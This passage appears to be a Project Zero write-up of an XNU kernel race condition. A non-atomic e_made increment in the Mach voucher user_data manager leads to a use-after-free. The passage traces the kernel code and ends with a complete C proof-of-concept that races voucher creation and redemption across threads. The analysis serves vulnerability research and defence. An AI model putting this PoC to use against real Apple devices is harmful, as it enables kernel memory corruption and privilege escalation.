ivace_release(

iv_index_t key_index,

iv_index_t value_index)

{

...

ivgt_lookup(key_index, FALSE, &ivam, &ivac);

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

assert(0 < ivace->ivace_refs);

/* cant release persistent values */

if (ivace->ivace_persist) {

ivac_unlock(ivac);

return;

}

if (0 < --ivace->ivace_refs) {

ivac_unlock(ivac);

return;

}

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock then take calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

key = iv_index_to_key(key_index);

assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

* if last return reply is still pending,

* let it handle this later return when

* the previous reply comes in.

if (ivace->ivace_releasing) {

ivac_unlock(ivac);

return;

}

/* claim releasing */

ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

value = ivace->ivace_value;

redrive:

assert(value == ivace->ivace_value);

assert(!ivace->ivace_free);

made = ivace->ivace_made;

ivac_unlock(ivac);

/* callout to manager's release_value */

kr = (ivam->ivam_release_value)(ivam, key, value, made);

/* recalculate entry address as table may have changed */

ivac_lock(ivac);

ivace = &ivac->ivac_table[value_index];

assert(value == ivace->ivace_value);

* new made values raced with this return. If the

* manager OK'ed the prior release, we have to start

* the made numbering over again (pretend the race

* didn't happen). If the entry has zero refs again,

* re-drive the release.

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute managers release_value callback is called:

kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

ipc_voucher_attr_manager_t __assert_only manager,

mach_voucher_attr_key_t __assert_only key,

mach_voucher_attr_value_handle_t value,

mach_voucher_attr_value_reference_t sync)

{

user_data_element_t elem;

iv_index_t hash;

assert(&user_data_manager == manager);

USER_DATA_ASSERT_KEY(key);

elem = (user_data_element_t)value;

hash = elem->e_hash;

user_data_lock();

if (sync == elem->e_made) {

queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

user_data_unlock();

kfree(elem, sizeof(*elem) + elem->e_size);

return KERN_SUCCESS;

}

assert(sync < elem->e_made);

user_data_unlock();

return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.

Having looked at the semantics of user_data_free_value let's look back at the callsite:

redrive:

assert(value == ivace->ivace_value);

assert(!ivace->ivace_free);

made = ivace->ivace_made;

ivac_unlock(ivac);

/* callout to manager's release_value */

kr = (ivam->ivam_release_value)(ivam, key, value, made);

/* recalculate entry address as table may have changed */

ivac_lock(ivac);

ivace = &ivac->ivac_table[value_index];

assert(value == ivace->ivace_value);

* new made values raced with this return. If the

* manager OK'ed the prior release, we have to start

* the made numbering over again (pretend the race

* didn't happen). If the entry has zero refs again,

* re-drive the release.

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_voucher_replace_value where the user_data_value_element and ivace are actually allocated:

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

... /* WINDOW */

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_voucher_replace_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that) and ivace_reference_by_value, which increments ivace->ivace_made does that under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window shown above, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element then we'll encounter one of the more complex situations outlined above where, in ivace_release ivace_made is not equal to the user_data_value_element's e_made field. The reason that there is special treatment of that case is that it's indicating that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.

With this insight we can start to unravel the "redrive" logic:

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

* If the manager returned FAILURE, someone took a

* reference on the value but have not updated the ivace,

* release the lock and return since thread who got

* the new reference will update the ivace and will have

* non-zero reference on the value.

if (KERN_SUCCESS != kr) {

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

}

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refs has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is never-the-less semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:

if (ivace->ivace_releasing) {

ivac_unlock(ivac);

return;

}

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

if (0 == ivace->ivace_refs) {

goto redrive;

}

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The conditions under which the other branch is taken is nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

* If the manager returned FAILURE, someone took a

* reference on the value but have not updated the ivace,

* release the lock and return since thread who got

* the new reference will update the ivace and will have

* non-zero reference on the value.

In this case, the code again just sets ivace_releasing to FALSE and continues.

Put another way, this comment explaining is exactly what happens when the racing thread was exactly in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

/* ... we found a match... */

elem->e_made++;

user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

switch (command) {

case MACH_VOUCHER_ATTR_REDEEM:

/* redeem of previous values is the value */

if (0 < prev_value_count) {

elem = (user_data_element_t)prev_values[0];

assert(0 < elem->e_made);

elem->e_made++;

*out_value = prev_values[0];

return KERN_SUCCESS;

}

/* redeem of default is default */

*out_value = 0;

return KERN_SUCCESS;

As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, that thread doesn't free new_value on thread B's stack:

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

... /* WINDOW */

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.

So how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! If, in the steady-state e_made is one less than ivace_made then we race two threads; thread A which is dropping the last ivace_ref and thread B which is attempting to revive it and thread B is in the WINDOW shown above then e_made gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment) then e_made is now exactly equal to ivace_made; the exact condition which indicates we cannot possibly be in the WINDOW shown above, and it's safe to free the user_data_value_element which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

Possible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

mach_port_t voucher = MACH_PORT_NULL;

kern_return_t kr = host_create_mach_voucher(

mach_host_self(),

(mach_voucher_attr_raw_recipe_array_t)recipe,

recipe_size,

&voucher);

if (kr != KERN_SUCCESS) {

printf("failed to create voucher from recipe\n");

}

return voucher;

}

static void*

create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

recipe->content_size = len;

uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

memcpy(content_buf, buf, len);

*template_size_out = recipe_size;

return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

recipe->content_size = len;

uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

memcpy(content_buf, buf, len);

mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

*template_size_out = recipe_size;

return recipe;

}

struct recipe_template_meta {

void* recipe;

size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {};

struct recipe_template_meta redeem_recipe_template = {};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

for (int i = 0; i < iter_limit; i++) {

mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

mach_port_deallocate(mach_task_self(), voucher_port);

}

return NULL;

}

void sploit_3() {

while(1) {

// choose a userdata size:

uint32_t userdata_size = (arc4random() % 2040)+8;

userdata_size += 7;

userdata_size &= (~7);

printf("userdata size: 0x%x\n", userdata_size);

uint8_t* userdata_buffer = calloc(userdata_size, 1);

((uint32_t*)userdata_buffer)[0] = arc4random();

((uint32_t*)userdata_buffer)[1] = arc4random();

// build the templates:

single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

free(userdata_buffer);

pthread_t single_recipe_thread;

pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

pthread_t redeem_recipe_thread;

pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

pthread_join(single_recipe_thread, NULL);

pthread_join(redeem_recipe_thread, NULL);

free(single_recipe_template.recipe);

free(redeem_recipe_template.recipe);

}

int main(int argc, char** argv) {

sploit_3();

}